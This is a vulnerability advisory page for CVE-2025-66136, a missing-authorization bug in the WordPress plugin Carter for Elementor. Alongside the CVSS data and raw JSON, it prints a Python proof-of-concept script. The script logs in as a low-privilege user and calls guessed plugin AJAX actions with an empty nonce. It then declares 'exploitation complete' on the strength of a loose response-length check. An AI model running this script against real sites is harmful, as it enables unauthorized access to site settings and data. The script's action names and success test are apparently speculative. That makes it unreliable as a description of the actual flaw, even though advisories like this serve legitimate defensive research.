Security Vulnerability Report
中文
CVE-2025-66136 CVSS 5.4 MEDIUM

CVE-2025-66136

Published: 2026-01-22 17:16:00
Last Modified: 2026-04-27 17:16:41

Description

Missing Authorization vulnerability in merkulove Carter for Elementor carter-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Carter for Elementor: from n/a through <= 1.0.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Carter for Elementor <= 1.0.2
Carter for Elementor: from n/a through <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66136 PoC - Carter for Elementor Authorization Bypass # Target: WordPress site with Carter for Elementor plugin <= 1.0.2 def exploit_carter_elementor(target_url, username, password): """ Exploit Missing Authorization in Carter for Elementor plugin This PoC demonstrates how a low-privileged user can access unauthorized functions """ session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Step 2: Identify vulnerable AJAX endpoints # Carter for Elementor may register AJAX actions without capability checks vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', ] # Step 3: Test for missing authorization # Common vulnerable actions in Carter for Elementor test_actions = [ 'carter_get_settings', 'carter_export_data', 'carter_get_templates', 'carter_save_config', ] for action in test_actions: data = { 'action': action, 'nonce': '' # May not be required due to missing check } response = session.post( f"{target_url}/wp-admin/admin-ajax.php", data=data ) if response.status_code == 200: # Check if we can access admin-only data if 'admin' in response.text.lower() or len(response.text) > 100: print(f"[+] Potential vulnerability found in action: {action}") print(f"[+] Response preview: {response.text[:200]}...") print("[*] Exploitation complete - check results above") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) exploit_carter_elementor(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66136", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:00.473", "lastModified": "2026-04-27T17:16:41.417", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Carter for Elementor carter-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Carter for Elementor: from n/a through <= 1.0.2."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en merkulove Carter para Elementor carter-elementor permite la Explotación de Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Carter para Elementor: desde n/a hasta &lt;= 1.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/carter-elementor/vulnerability/wordpress-carter-for-elementor-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}